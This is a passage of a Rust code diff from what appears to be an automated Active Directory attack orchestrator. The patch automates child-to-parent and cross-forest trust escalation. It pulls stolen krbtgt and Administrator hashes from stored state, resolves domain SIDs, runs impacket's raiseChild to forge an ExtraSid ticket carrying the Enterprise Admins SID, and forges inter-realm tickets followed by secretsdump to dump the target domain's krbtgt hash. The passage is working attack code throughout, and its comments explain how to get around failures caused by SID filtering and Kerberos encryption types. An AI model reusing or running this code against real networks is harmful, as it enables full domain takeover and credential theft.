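+ // e.g. with parent domain SID "S-1-5-21-1111-2222-3333" (illustrative),
+ // appending RID 519 gives the Enterprise Admins SID
+ // "S-1-5-21-1111-2222-3333-519" that the forged PAC must carry.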
+ let parent_lower = parent_domain.to_lowercase();
+ let cd_lower = child_domain.to_lowercase();
+ let (
+ mut have_target_sid,
+ mut have_source_sid,
+ child_admin_cred,
+ child_admin_hash,
+ child_dc_ip,
+ ) = {
let s = dispatcher.state.read().await;
- if let Some(sid) = s.domain_sids.get(&child_domain.to_lowercase()) {
+ if let Some(sid) = s.domain_sids.get(&cd_lower) {
payload["source_sid"] = json!(sid);
}
- if let Some(sid) = s.domain_sids.get(&parent_domain.to_lowercase()) {
+ if let Some(sid) = s.domain_sids.get(&parent_lower) {
payload["target_sid"] = json!(sid);
}
- }
+ if let Some(child_krbtgt) = s.hashes.iter().find(|h| {
+ h.username.eq_ignore_ascii_case("krbtgt")
+ && h.domain.to_lowercase() == cd_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ }) {
+ payload["child_krbtgt_hash"] = json!(child_krbtgt.hash_value);
+ }
+ let admin_cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && c.domain.to_lowercase() == cd_lower
+ })
+ .cloned();
+ let admin_hash = s
+ .hashes
+ .iter()
+ .find(|h| {
+ h.username.to_lowercase() == "administrator"
+ && h.domain.to_lowercase() == cd_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ })
+ .cloned();
+ let child_dc = s.resolve_dc_ip(&child_domain);
+ (
+ s.domain_sids.contains_key(&parent_lower),
+ s.domain_sids.contains_key(&cd_lower),
+ admin_cred,
+ admin_hash,
+ child_dc,
+ )
+ };
- match dispatcher
- .throttled_submit("exploit", "privesc", payload, 1)
+ if !have_target_sid {
+ if let Some((sid, admin_name)) = super::golden_ticket::resolve_domain_sid(
+ &parent_domain,
+ &parent_dc_ip,
+ child_admin_cred.as_ref(),
+ child_admin_hash.as_ref(),
+ )
.await
- {
- Ok(Some(task_id)) => {
+ {
info!(
- task_id = %task_id,
+ parent_domain = %parent_domain,
+ sid = %sid,
+ "Resolved parent domain SID via lookupsid for child-to-parent ExtraSid"
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let _ = reader.set_domain_sid(&mut conn, &parent_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &parent_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(parent_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(parent_lower.clone(), name.clone());
+ }
+ }
+ payload["target_sid"] = json!(sid);
+ have_target_sid = true;
+ } else {
+ warn!(
child_domain = %child_domain,
parent_domain = %parent_domain,
- auth = auth_method,
- "Child-to-parent escalation dispatched"
+ parent_dc_ip = %parent_dc_ip,
+ "Could not resolve parent SID — deferring child-to-parent dispatch"
);
- let _ = dispatcher
- .state
- .mark_exploited(&dispatcher.queue, &vuln_id)
- .await;
- dispatcher
- .state
- .write()
- .await
- .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
- let _ = dispatcher
- .state
- .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
- .await;
- }
- Ok(None) => {
- debug!("Child-to-parent deferred by throttler");
}
- Err(e) => {
- warn!(err = %e, "Failed to dispatch child-to-parent escalation")
+ }
+ if !have_target_sid {
+ continue;
+ }
+
+ // Resolve child domain SID if not cached (needed for ExtraSid golden ticket)
+ if !have_source_sid {
+ if let Some(ref child_dc) = child_dc_ip {
+ if let Some((sid, admin_name)) =
+ super::golden_ticket::resolve_domain_sid(
+ &child_domain,
+ child_dc,
+ child_admin_cred.as_ref(),
+ child_admin_hash.as_ref(),
+ )
+ .await
+ {
+ info!(
+ child_domain = %child_domain,
+ sid = %sid,
+ "Resolved child domain SID via lookupsid for child-to-parent ExtraSid"
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let _ = reader.set_domain_sid(&mut conn, &cd_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &cd_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(cd_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(cd_lower.clone(), name.clone());
+ }
+ }
+ payload["source_sid"] = json!(sid);
+ have_source_sid = true;
+ } else {
+ warn!(
+ child_domain = %child_domain,
+ child_dc_ip = %child_dc,
+ "Could not resolve child SID — deferring child-to-parent dispatch"
+ );
+ }
+ } else {
+ warn!(
+ child_domain = %child_domain,
+ "No child DC IP available — deferring child-to-parent dispatch"
+ );
}
}
+ if !have_source_sid {
+ continue;
+ }
+
+ // Use raiseChild.py (impacket's canonical child→parent ExtraSid
+ // automation) via DIRECT tool dispatch (no LLM in the loop).
+ // This replaces the previous golden_ticket + secretsdump_kerberos
+ // combo, which fails because impacket's cross-realm referral is
+ // broken (fortra/impacket#315): a child-realm ticket presented
+ // to the parent KDC returns KDC_ERR_WRONG_REALM /
+ // KDC_ERR_PREAUTH_FAILED. raiseChild forges the inter-realm
+ // chain internally and dumps parent krbtgt + Administrator in
+ // one shot.
+ //
+ // Direct dispatch_tool bypasses the LLM agent loop entirely —
+ // the orchestrator owns every input (child admin hash, child
+ // DC IP, parent DC IP), so there is no value in laundering them
+ // through an LLM that might typo or omit args.
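+ // Rough manual equivalent (illustrative impacket invocation):
+ //   raiseChild.py -hashes :<child_admin_NT> child.contoso.local/Administrator
+ // forging the ExtraSid chain and dumping parent krbtgt + Administrator.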
+ let admin_hash_value = child_admin_hash.as_ref().map(|h| h.hash_value.clone());
+ let admin_password = child_admin_cred
+ .as_ref()
+ .map(|c| c.password.clone())
+ .filter(|p| !p.is_empty());
+ if admin_hash_value.is_none() && admin_password.is_none() {
+ warn!(
+ child_domain = %child_domain,
+ parent_domain = %parent_domain,
+ "No child Administrator hash or password — deferring child-to-parent (raise_child needs auth)"
+ );
+ continue;
+ }
+
+ // raiseChild auto-discovers parent forest root via the
+ // child DC's trustedDomain LDAP objects and resolves DC IPs
+ // via DNS — script-level flags for IP/domain are unsupported
+ // (argparse exit 2). However, on workers without forest DNS,
+ // the bare domain FQDN (`child.contoso.local`) won't
+ // resolve — so we pass the IPs and let the tool wrapper
+ // pre-seed `/etc/hosts` before invoking impacket.
+ let mut raise_args = json!({
+ "child_domain": child_domain.clone(),
+ "username": "Administrator",
+ });
+ if let Some(h) = admin_hash_value {
+ raise_args["hash"] = json!(h);
+ } else if let Some(p) = admin_password {
+ raise_args["password"] = json!(p);
+ }
+ if let Some(ref ip) = child_dc_ip {
+ raise_args["child_dc_ip"] = json!(ip);
+ }
+ raise_args["parent_domain"] = json!(parent_domain.clone());
+ if !parent_dc_ip.is_empty() {
+ raise_args["parent_dc_ip"] = json!(parent_dc_ip.clone());
+ }
+
+ let call = ToolCall {
+ id: format!("raise_child_{}", uuid::Uuid::new_v4().simple()),
+ name: "raise_child".to_string(),
+ arguments: raise_args,
+ };
+ let task_id = format!(
+ "trust_raise_child_{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..12]
+ );
+
+ // Mark dedup BEFORE spawning so the next 30s tick doesn't
+ // re-dispatch the same trust while raiseChild is running.
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
+ .await;
+
+ info!(
+ task_id = %task_id,
+ child_domain = %child_domain,
+ parent_domain = %parent_domain,
+ auth = auth_method,
+ "Dispatching raise_child (direct tool, no LLM)"
+ );
+
+ // Spawn so the trust loop continues processing other items
+ // while raiseChild runs (typically 30–120s). mark_exploited
+ // is gated on observed parent krbtgt — no premature marking.
+ let dispatcher_bg = dispatcher.clone();
+ let parent_domain_bg = parent_domain.clone();
+ let child_domain_bg = child_domain.clone();
+ let vuln_id_bg = vuln_id.clone();
+ tokio::spawn(async move {
+ let result = dispatcher_bg
+ .llm_runner
+ .tool_dispatcher()
+ .dispatch_tool("privesc", &task_id, &call)
+ .await;
+ match result {
+ Ok(exec_result) => {
+ if let Some(err) = exec_result.error.as_ref() {
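+ // Keep only the last ~2000 chars of output: reverse, take, reverse back.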
+ let tail: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::<String>()
+ .chars()
+ .rev()
+ .collect();
+ warn!(
+ err = %err,
+ child_domain = %child_domain_bg,
+ parent_domain = %parent_domain_bg,
+ output_tail = %tail,
+ "raise_child returned error"
+ );
+ return;
+ }
+ // Verify parent compromise — only mark exploited
+ // when we actually observe parent krbtgt.
+ //
+ // Inspect exec_result.discoveries directly:
+ // dispatch_tool returns BEFORE push_realtime_discoveries
+ // finishes pumping hashes into state.hashes, so reading
+ // state here is too early and produces a false negative.
+ let parent_lower = parent_domain_bg.to_lowercase();
+ let has_parent_krbtgt = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("hashes"))
+ .and_then(|h| h.as_array())
+ .map(|hashes| {
+ hashes.iter().any(|h| {
+ let user = h
+ .get("username")
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ let dom = h
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ let htype = h
+ .get("hash_type")
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ user.eq_ignore_ascii_case("krbtgt")
+ && dom.to_lowercase() == parent_lower
+ && htype.eq_ignore_ascii_case("ntlm")
+ })
+ })
+ .unwrap_or(false);
+ let tail_for_log: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::<String>()
+ .chars()
+ .rev()
+ .collect();
+ if has_parent_krbtgt {
+ info!(
+ parent_domain = %parent_domain_bg,
+ "raise_child compromised parent — marking exploited"
+ );
+ let _ = dispatcher_bg
+ .state
+ .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+ .await;
+ let techniques =
+ vec!["T1134.005".to_string(), "T1003.006".to_string()];
+ let event_id = format!(
+ "evt-raise-child-{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..8]
+ );
+ let event = serde_json::json!({
+ "id": event_id,
+ "timestamp": chrono::Utc::now().to_rfc3339(),
+ "source": "trust_automation",
+ "description": format!(
+ "Child-to-parent ExtraSid escalation: {} \u{2192} {} via raiseChild",
+ child_domain_bg, parent_domain_bg
+ ),
+ "mitre_techniques": techniques,
+ });
+ let _ = dispatcher_bg
+ .state
+ .persist_timeline_event(
+ &dispatcher_bg.queue,
+ &event,
+ &techniques,
+ )
+ .await;
+ } else {
+ warn!(
+ parent_domain = %parent_domain_bg,
+ output_tail = %tail_for_log,
+ "raise_child completed but no parent krbtgt observed — NOT marking exploited"
+ );
+ }
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ child_domain = %child_domain_bg,
+ parent_domain = %parent_domain_bg,
+ "raise_child dispatch errored"
+ );
+ }
+ }
+ });
}
}
}
@@ -557,11 +1227,10 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
}
// Follow trust keys (inter-realm ticket + foreign secretsdump)
- let (work, admin_cred_phase3, admin_hash_phase3): (
- Vec<TrustFollowWork>,
- Option<ares_core::models::Credential>,
- Option<ares_core::models::Hash>,
- ) = {
+ //
+ // The deterministic forge uses only the trust key + SIDs (already on
+ // each TrustFollowWork item); admin creds are no longer needed here.
+ let work: Vec<TrustFollowWork> = {
let state = dispatcher.state.read().await;
// Skip if no domain admin yet — trust extraction requires DA-level creds
@@ -578,29 +1247,6 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
.map(|t| (t.flat_name.to_uppercase(), t))
.collect();
- let admin_cred = state
- .credentials
- .iter()
- .find(|c| c.is_admin && !c.password.is_empty())
- .cloned();
- // Find admin hash from any dominated domain with a DC
- let admin_hash = if admin_cred.is_none() {
- state
- .domain_controllers
- .keys()
- .filter(|d| state.dominated_domains.contains(&d.to_lowercase()))
- .find_map(|dom| {
- state.hashes.iter().find(|h| {
- h.username.to_lowercase() == "administrator"
- && h.domain.to_lowercase() == dom.to_lowercase()
- && h.hash_type.to_uppercase() == "NTLM"
- })
- })
- .cloned()
- } else {
- None
- };
-
let items = state
.hashes
.iter()
@@ -609,9 +1255,7 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
return None;
}
- // Only process hashes that match a known trust account
let netbios = hash.username.trim_end_matches('$').to_uppercase();
- let trust = trust_by_flat.get(&netbios)?;
// Resolve source domain — fall back to first dominated domain
// with a DC when secretsdump output lacks domain prefix
@@ -628,24 +1272,44 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
if source_domain.is_empty() {
return None;
}
+ let source_lower = source_domain.to_lowercase();
+
+ // Resolve target FQDN: prefer explicit TrustInfo from LDAP
+ // enumeration, else derive from known domains where the
+ // NetBIOS label matches and the FQDN is not the source
+ // (filters out same-domain machine accounts).
+ let target_domain = if let Some(t) = trust_by_flat.get(&netbios) {
+ t.domain.clone()
+ } else {
+ state
+ .domain_controllers
+ .keys()
+ .chain(state.dominated_domains.iter())
+ .find(|d| {
+ let dl = d.to_lowercase();
+ dl != source_lower
+ && d.split('.')
+ .next()
+ .map(|label| label.to_uppercase() == netbios)
+ .unwrap_or(false)
+ })
+ .cloned()?
+ };
let dedup_key = format!(
"trust_follow:{}:{}",
- source_domain.to_lowercase(),
+ source_lower,
hash.username.to_lowercase()
);
if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) {
return None;
}
- // Use the FQDN from the trust relationship — never fall back
- // to bare NetBIOS name which produces invalid domain strings.
- let target_domain = trust.domain.clone();
-
- let target_dc_ip = state
- .domain_controllers
- .get(&target_domain.to_lowercase())
- .cloned();
+ // Use resolve_dc_ip so we fall back to the hosts table when
+ // domain_controllers lacks an explicit entry for the foreign
+ // domain — common for cross-forest trusts where the foreign
+ // DC is only known via host scan, not LDAP enumeration.
+ let target_dc_ip = state.resolve_dc_ip(&target_domain);
let source_domain_sid = state
.domain_sids
@@ -656,11 +1320,6 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
.get(&target_domain.to_lowercase())
.cloned();
- let source_dc_ip = state
- .domain_controllers
- .get(&source_domain.to_lowercase())
- .cloned();
-
Some(TrustFollowWork {
dedup_key,
hash: hash.clone(),
@@ -669,20 +1328,34 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
target_dc_ip,
source_domain_sid,
target_domain_sid,
- source_dc_ip,
})
})
.collect();
- (items, admin_cred, admin_hash)
+ items
};
for item in work {
let vuln_id = forest_trust_vuln_id(&item.source_domain, &item.target_domain);
- let trust_target = item
- .target_dc_ip
- .clone()
- .unwrap_or_else(|| item.target_domain.clone());
+
+ // Defer dispatch when the target DC IP is unknown: impacket needs
+ // a routable -target-ip for both create_inter_realm_ticket and the
+ // forge-and-present secretsdump fallback. Passing the bare domain
+ // string fails fast and burns the dedup key. Re-tick in 30s and
+ // let host scans / trust enum populate the DC entry first.
+ let target_dc_ip = match item.target_dc_ip.clone() {
+ Some(ip) => ip,
+ None => {
+ debug!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ trust_account = %item.hash.username,
+ "Deferring forest trust escalation — target DC IP unresolved"
+ );
+ continue;
+ }
+ };
+ let trust_target = target_dc_ip.clone();
{
let mut details = std::collections::HashMap::new();
details.insert(
@@ -720,77 +1393,417 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
.await;
}
- // 1. Dispatch inter-realm ticket creation.
- // Use field names that match the tool and prompt expectations:
- // - `vuln_type` routes to generate_trust_key_prompt
- // - `source_sid`/`target_sid` match create_inter_realm_ticket tool
- // - `trusted_domain` is read by the trust prompt
- // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing
- let mut ticket_payload = json!({
- "technique": "create_inter_realm_ticket",
- "vuln_type": "cross_forest",
- "domain": item.source_domain,
- "trusted_domain": item.target_domain,
- "target_domain": item.target_domain,
- "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain),
- "trust_key": item.hash.hash_value,
- "trust_account": item.hash.username,
- "vuln_id": &vuln_id,
- });
- if let Some(ref sid) = item.source_domain_sid {
- ticket_payload["source_sid"] = json!(sid);
- }
- if let Some(ref sid) = item.target_domain_sid {
- ticket_payload["target_sid"] = json!(sid);
- }
- if let Some(ref aes) = item.hash.aes_key {
- ticket_payload["aes_key"] = json!(aes);
- }
- if let Some(ref dc_ip) = item.source_dc_ip {
- ticket_payload["dc_ip"] = json!(dc_ip);
- }
- if let Some(ref cred) = admin_cred_phase3 {
- ticket_payload["username"] = json!(cred.username);
- ticket_payload["password"] = json!(cred.password);
- } else if let Some(ref hash) = admin_hash_phase3 {
- ticket_payload["username"] = json!(hash.username);
- ticket_payload["admin_hash"] = json!(hash.hash_value);
+ // Skip self-referential trust (source == target)
+ if item.source_domain.to_lowercase() == item.target_domain.to_lowercase() {
+ debug!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ "Skipping self-referential trust escalation"
+ );
+ continue;
}
- match dispatcher
- .throttled_submit("exploit", "privesc", ticket_payload, 1)
- .await
+ // Suppress the ExtraSid forge when the trust has SID filtering
+ // active. ticketer adds Enterprise Admins (RID 519) via
+ // `--extra-sid` to satisfy DCSync — but a SID-filtered forest
+ // trust strips RID<1000 SIDs from the cross-realm PAC, and the
+ // target KDC returns rpc_s_access_denied. Burn the dedup so this
+ // doomed dispatch can't loop, and wake the cross-forest fallback
+ // paths (ACL/MSSQL/FSP) to take over.
{
- Ok(Some(task_id)) => {
+ let state = dispatcher.state.read().await;
+ if is_filtered_inter_forest_trust(&state, &item.source_domain, &item.target_domain)
+ {
info!(
- task_id = %task_id,
+ source = %item.source_domain,
+ target = %item.target_domain,
trust_account = %item.hash.username,
- source_domain = %item.source_domain,
- target_domain = %item.target_domain,
- has_source_sid = item.source_domain_sid.is_some(),
- has_target_sid = item.target_domain_sid.is_some(),
- "Inter-realm ticket task dispatched"
+ "Suppressing forge_inter_realm_and_dump — SID filtering on cross-forest trust would reject ExtraSid; waking fallbacks"
);
+ drop(state);
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone());
let _ = dispatcher
.state
- .mark_exploited(&dispatcher.queue, &vuln_id)
+ .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key)
.await;
- }
- Ok(None) => {
- debug!("Inter-realm ticket deferred by throttler");
+ wake_cross_forest_fallbacks(&dispatcher, &item.target_domain).await;
+
+ // Dispatch `create_inter_realm_ticket` so downstream Kerberos-capable
+ // tools (e.g. bloodyad with -k) have a valid ccache for the target
+ // forest. SID filtering blocks ExtraSid-based DCSync, but the forged
+ // TGT still allows Kerberos LDAP bind as Administrator. The tool writes
+ // Administrator.ccache in a tempdir; we persist the full path to Redis
+ // via `publish_kerberos_ticket` so the credential resolver can find it.
+ {
+ let dispatcher_bg = dispatcher.clone();
+ let source_domain_bg = item.source_domain.clone();
+ let target_domain_bg = item.target_domain.clone();
+ let trust_key_bg = item.hash.hash_value.clone();
+ let aes_key_bg = item.hash.aes_key.clone();
+ let source_domain_sid_bg = {
+ let s = dispatcher.state.read().await;
+ s.domain_sids
+ .get(&item.source_domain.to_lowercase())
+ .cloned()
+ };
+ tokio::spawn(async move {
+ dispatch_create_inter_realm_ticket(
+ &dispatcher_bg,
+ &source_domain_bg,
+ &target_domain_bg,
+ &trust_key_bg,
+ aes_key_bg.as_deref(),
+ source_domain_sid_bg.as_deref(),
+ )
+ .await;
+ });
+ }
continue;
}
- Err(e) => {
- warn!(err = %e, "Failed to dispatch inter-realm ticket");
- continue;
+ }
+
+ // Forge-and-present the inter-realm TGT as a deterministic worker
+ // task — NOT an LLM task. Both `create_inter_realm_ticket` and
+ // `secretsdump_kerberos` run sequentially on the same worker via
+ // `expand_technique_task`, so the ccache file produced by ticketer
+ // is on the same filesystem when secretsdump reads it.
+ //
+ // Routing through the LLM here would launder deterministic values
+ // (NT hash, AES key, SIDs) through token generation — the LLM
+ // would have to copy them out of the rendered prompt into tool
+ // call args, where they get dropped, typo'd, or omitted. The
+ // orchestrator already owns every input; deliver them directly.
+ //
+ // Resolve the target DC hostname so Kerberos auth can match the
+ // SPN baked into the ticket. Falls back to the IP, which works
+ // when the worker can reverse-resolve via DNS.
+ let target_dc_hostname = {
+ let s = dispatcher.state.read().await;
+ s.hosts
+ .iter()
+ .find(|h| h.ip == target_dc_ip && !h.hostname.is_empty())
+ .map(|h| h.hostname.clone())
+ .or_else(|| {
+ s.hosts
+ .iter()
+ .find(|h| {
+ (h.is_dc || h.detect_dc())
+ && h.hostname.to_lowercase().ends_with(&format!(
+ ".{}",
+ item.target_domain.to_lowercase()
+ ))
+ })
+ .map(|h| h.hostname.clone())
+ })
+ .unwrap_or_else(|| target_dc_ip.clone())
+ };
+
+ // ticketer writes .ccache in the worker cwd; the
+ // following secretsdump_kerberos call reads it via KRB5CCNAME.
+ let ticket_username = "Administrator";
+ let ticket_path = format!("{ticket_username}.ccache");
+
+ // Resolve missing source SID via lookupsid against the source
+ // DC. ticketer.py needs `--domain-sid` for the source realm to
+ // build a valid PAC; without it the resulting ticket gets
+ // rejected by the target KDC. We have DA on the source domain
+ // (cross-forest forge only fires after DA), so SAMR lookupsid
+ // works with either a password cred or admin NTLM hash.
+ let source_domain_sid = if item.source_domain_sid.is_some() {
+ item.source_domain_sid.clone()
+ } else {
+ let (source_dc_ip, src_cred, src_hash) = {
+ let s = dispatcher.state.read().await;
+ let src_lower = item.source_domain.to_lowercase();
+ let dc = s.resolve_dc_ip(&item.source_domain);
+ let cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && c.domain.to_lowercase() == src_lower
+ })
+ .cloned();
+ let h = s
+ .hashes
+ .iter()
+ .find(|h| {
+ h.username.to_lowercase() == "administrator"
+ && h.domain.to_lowercase() == src_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ })
+ .cloned();
+ (dc, cred, h)
+ };
+ let resolved = if let Some(ref dc_ip) = source_dc_ip {
+ super::golden_ticket::resolve_domain_sid(
+ &item.source_domain,
+ dc_ip,
+ src_cred.as_ref(),
+ src_hash.as_ref(),
+ )
+ .await
+ } else {
+ None
+ };
+ if let Some((sid, admin_name)) = resolved {
+ info!(
+ source_domain = %item.source_domain,
+ sid = %sid,
+ "Resolved source domain SID for cross-forest forge"
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let src_lower = item.source_domain.to_lowercase();
+ let _ = reader.set_domain_sid(&mut conn, &src_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &src_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(src_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(src_lower, name.clone());
+ }
+ }
+ Some(sid)
+ } else {
+ warn!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ "Could not resolve source SID — deferring cross-forest forge"
+ );
+ None
}
+ };
+ if source_domain_sid.is_none() {
+ continue;
}
- // The privesc agent handles the full flow: forge inter-realm ticket →
- // secretsdump_kerberos against the target DC. No separate credential_access
- // dispatch needed (it lacked valid auth and always failed).
+ // For child→parent forges we MUST inject the parent's Enterprise
+ // Admins SID (RID 519) as ExtraSid; without it the parent KDC
+ // issues a TGS but DRSUAPI on the parent DC rejects the
+ // replication call as `rpc_s_access_denied` and nxc dumps zero
+ // hashes (exit 0, hiding the failure).
+ //
+ // For cross-forest forges, the target domain SID is required for
+ // ticketer.py to build a PAC the target KDC will accept (without
+ // it the inter-realm TGT is rejected and forge_inter_realm_and_dump
+ // returns 0 hashes, locking dedup permanently). Resolve the target
+ // SID on-demand via lookupsid against the target DC using source
+ // admin creds (cross-trust SAMR works post-DA) when it isn't
+ // cached. Defer dispatch (no dedup mark) when resolution fails so
+ // the next 30s tick can retry once sid_enumeration populates it
+ // via lsaquery.
+ let source_l = item.source_domain.to_lowercase();
+ let target_l = item.target_domain.to_lowercase();
+ let is_child_to_parent =
+ source_l != target_l && source_l.ends_with(&format!(".{target_l}"));
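+ // Illustrative (hypothetical names): source "child.corp.example" with
+ // target "corp.example" matches the ".{target}" suffix and is treated
+ // as child→parent (intra-forest); source "corp.example" with target
+ // "partner.example" shares no suffix and takes the cross-forest path.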
+ let needs_target_sid = source_l != target_l;
+ let target_domain_sid: Option<String> =
+ if !needs_target_sid || item.target_domain_sid.is_some() {
+ item.target_domain_sid.clone()
+ } else {
+ let (src_cred, src_hash) = {
+ let s = dispatcher.state.read().await;
+ let src_lower = item.source_domain.to_lowercase();
+ let cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && c.domain.to_lowercase() == src_lower
+ })
+ .cloned();
+ let h = s
+ .hashes
+ .iter()
+ .find(|h| {
+ h.username.to_lowercase() == "administrator"
+ && h.domain.to_lowercase() == src_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ })
+ .cloned();
+ (cred, h)
+ };
+ let resolved = super::golden_ticket::resolve_domain_sid(
+ &item.target_domain,
+ &target_dc_ip,
+ src_cred.as_ref(),
+ src_hash.as_ref(),
+ )
+ .await;
+ if let Some((sid, admin_name)) = resolved {
+ let label = if is_child_to_parent {
+ "Resolved parent domain SID for child→parent forge ExtraSid"
+ } else {
+ "Resolved target domain SID for cross-forest forge"
+ };
+ info!(
+ target_domain = %item.target_domain,
+ sid = %sid,
+ "{}", label
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let tgt_lower = item.target_domain.to_lowercase();
+ let _ = reader.set_domain_sid(&mut conn, &tgt_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &tgt_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(tgt_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(tgt_lower, name.clone());
+ }
+ }
+ Some(sid)
+ } else {
+ let label = if is_child_to_parent {
+ "Could not resolve parent SID — deferring child→parent forge"
+ } else {
+ "Could not resolve target SID — deferring cross-forest forge"
+ };
+ warn!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ target_dc_ip = %target_dc_ip,
+ "{}", label
+ );
+ None
+ }
+ };
+ if needs_target_sid && target_domain_sid.is_none() {
+ continue;
+ }
- // Mark as processed
+ // Wait for AES256 to upsert before dispatching cross-forest forge.
+ // secretsdump runs twice (NTLM-only first, then -aes-types) and the
+ // second call typically lands ~60-90s after NTLM. If we dispatch
+ // before AES arrives, Win2016+ targets reject the RC4-only ticket
+ // with KDC_ERR_TGT_REVOKED and forge_inter_realm_and_dump yields
+ // zero hashes — locking dedup on a doomed dispatch.
+ //
+ // Re-read state.hashes for an AES-equipped variant of this trust
+ // account; if present, use it. If absent, defer up to ~3 min so the
+ // second secretsdump can land. After that, dispatch with NTLM-only
+ // as a last resort (some target DCs still accept RC4, and the
+ // wake_cross_forest_fallbacks path is the real safety net).
+ let resolved_aes_key: Option<String> = if needs_target_sid {
+ let from_state = {
+ let s = dispatcher.state.read().await;
+ s.hashes
+ .iter()
+ .find(|h| {
+ h.username.eq_ignore_ascii_case(&item.hash.username)
+ && h.domain.eq_ignore_ascii_case(&item.hash.domain)
+ && h.aes_key.is_some()
+ })
+ .and_then(|h| h.aes_key.clone())
+ };
+ let aes = item.hash.aes_key.clone().or(from_state);
+ if aes.is_none() {
+ let attempts = {
+ let mut state = dispatcher.state.write().await;
+ let count = state
+ .forge_aes_defers
+ .entry(item.dedup_key.clone())
+ .or_insert(0);
+ *count += 1;
+ *count
+ };
+ const MAX_AES_DEFERS: u32 = 6;
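+ // 6 defers at the 30s collection tick matches the ~3 min budget above.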
+ if attempts <= MAX_AES_DEFERS {
+ debug!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ trust_account = %item.hash.username,
+ attempts,
+ "Deferring cross-forest forge — AES256 not yet upserted on trust hash"
+ );
+ continue;
+ }
+ warn!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ trust_account = %item.hash.username,
+ "Dispatching cross-forest forge with NTLM-only after AES wait exhausted"
+ );
+ None
+ } else {
+ aes
+ }
+ } else {
+ item.hash.aes_key.clone()
+ };
+
+ // Build args for the combined `forge_inter_realm_and_dump` tool.
+ // This single tool runs impacket-ticketer + impacket-secretsdump
+ // sequentially in one worker invocation (shared tempdir as cwd),
+ // so the .ccache produced by ticketer is on the same filesystem
+ // when secretsdump reads it. Two split dispatch_tool calls would
+ // land on different worker pods with no shared FS.
+ let mut tool_args = json!({
+ "source_domain": &item.source_domain,
+ "target_domain": &item.target_domain,
+ "trust_key": &item.hash.hash_value,
+ "username": ticket_username,
+ // `target` is the DC hostname (or IP fallback) for the SPN
+ // baked into the ticket; `dc_ip` is the routable IP used
+ // for impacket-secretsdump's `-dc-ip`.
+ "target": &target_dc_hostname,
